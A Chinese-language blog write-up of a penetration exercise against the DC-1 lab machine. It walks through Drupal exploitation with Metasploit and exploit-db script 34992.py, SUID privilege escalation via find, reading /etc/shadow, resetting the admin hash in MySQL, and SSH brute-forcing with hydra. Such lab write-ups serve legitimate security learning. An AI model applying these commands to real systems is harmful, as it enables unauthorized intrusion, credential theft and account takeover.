端口扫描
首先靶机与测试机通过桥接模式同在一个局域网下,在测试机中输入netdiscover
发现目标ip地址和mac地址如下
其中192.168.1.9
即为目标,接下来nmap端口扫描一波
1 | nmap -A -sV -sC 192.168.1.9 > DC1.txt |
观察可知,对方开放了22(ssh),80(http)等服务,我们先从80端口访问获取些信息。
同时dirsearch跑一跑目录
1 | python3 dirsearch.py -u http://192.168.1.9/ -e* |
发现其存在/robots.txt文件,我们把其信息保存下来
1 | curl http://192.168.1.9/robots.txt > DC1_robots.txt |
我们发现其中一个UPGRADE.txt文件,确定其CMS为drupal
(没听过),版本大概6.x。
漏洞利用
打开msf然后搜索该CMS有了发现
接下来就是msf的使用了,使用如下命令行,选择对应的exp进行设置
1 | msfconsole |
直接回弹shell
此刻拿到了shell但无root权限,进入/home目录发现一个flag4的文件夹,进入有一个flag4.txt文件,打开是以句话
权限提升
对于该linux内核,提权想到用上次的linpeas.sh
脚本,将其上传至靶机
1 | upload /home/xxx/linpeas.sh //home//flag4 #双斜杠上传 |
结果!夭寿了,Unknown Command bash!
才发现自己挂着meterpreter
无法完成一些操作,要输入shell
转换成正常用户进行,这时候在/var/www
(也就是日进来的初始位置)处发现一个我们并未扫出来的flag1.txt
该非交互式shell不方便,查询后使用如下命令进入一个交互式的shell
1 | python -c "import pty;pty.spawn('/bin/bash')" |
然后就是常提到的suid
提权,先找到一个root
有x
权限的文件
1 | find / -perm -u=s -type f 2>/dev/null |
其中在/usr/bin/find
处可以试试find提权
有x权限!
接下来使用命令进行提权
1 | find test -exec "/bin/sh" \; |
要注意其中test为该目录下可找到的文件!若无权限情况下可用mkdir
试试,然后不要漏掉任何一个符号。
至此提权完成,root用户
查找其他flag文件
在无root权限下无法打开的/var/www/sites/default
中的配置文件settings.php
中发现了第二个flag
&账号和密码!
用mysql的连接方式连接
1 | mysql -u dbuser -p |
进入其中,首先查询数据库名,一定要记着带上”;”符号!
1 | SHOW DATABASES; #显示查询数据库名 |
接下来在scripts
文件夹下发现了一个password-hash.sh
的脚本可以转换hash值,重设了5201314的hash值之后上传更新admin账户的密码。($S$不属于常规的md5或者SHA -1加密,估计是其自设的加密方法,所以在其前端必定会有转换脚本,只需通过其转换脚换成自己设置的密码,即可通过前端验证)。此外,还有一种思路,msf模块中还有个添加管理员账户的exp也可使用。
1 | update drupaldb.users set pass="$S$DHy2B2skKRe./wrVEizKU5EuQfQwZQsWkSjopftZLCs3UWHMSsGi" where name="admin"; |
另一种,查询msf
中针对drupal
这种CMS的脚本
1 | msfconsole |
然后使用34992.py这个脚本
1 | python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.1.9 -u admin1 -p 5201314 |
于是我们登陆进来了。再其中的content模块中找到了flag3
最后一个flag寻找
在flag3时我们看到了提示/etc/shadow
和/etc/passwd
这个路径下,我们打开看看
QWQ!!!
一发就中,/home/flag4
说明flag4是其一个用户,打开shadow文件康康保存的密码信息
$6$说明其采用的是SHA-512加密,好家伙,这基本上夭折了我反解密的路,虽然不抱希望还是试试cmd5
果然,那接下来就爆破吧,之前的22端口ssh服务就是个伏笔。_(:з」∠)_
HYDRA再立功!
直接登上去康康
1 | ssh flag4@192.168.1.9 |
查了查flag,,,发现flag4我之前就找到了,无root情况下就找到了还能打开,,,那最后一个在哪。。。
最后康了康/root
文件夹,,,发现就在这里。。。
尾声
梳理一下整个过程,也觉得很奇怪hhh,为什么在meterpreter时候就可以直接康/home/flag4
的内容?最后多跑一步爆破(虽然又爆出来了很开心),同时据说查看thefinalflag.txt
也可以直接上传冰蝎的木马,虽然还没有尝试,但值得怀疑(因为/root需要权限,冰蝎马应该无法直接提权)。
最后,就像flag里说的 well down!!!!
。记得看到的一句话说的很对
技术是无罪的,资本胁迫着开源的技术为其攫取利益。
开源的的精神一直传递下来,我能从这个靶机里感受到先达者们设计的用心和对后来者的关心,总之,我玩的很开心。
引用某个姐姐的一句话QWQ
I hacked for fun, not for 饭
加油!
- 本文作者: Isabella
- 本文链接: https://username.github.io/2021/01/27/DC1靶机渗透记录/
- 版权声明: 本博客所有文章除特别声明外,均采用 MIT 许可协议。转载请注明出处!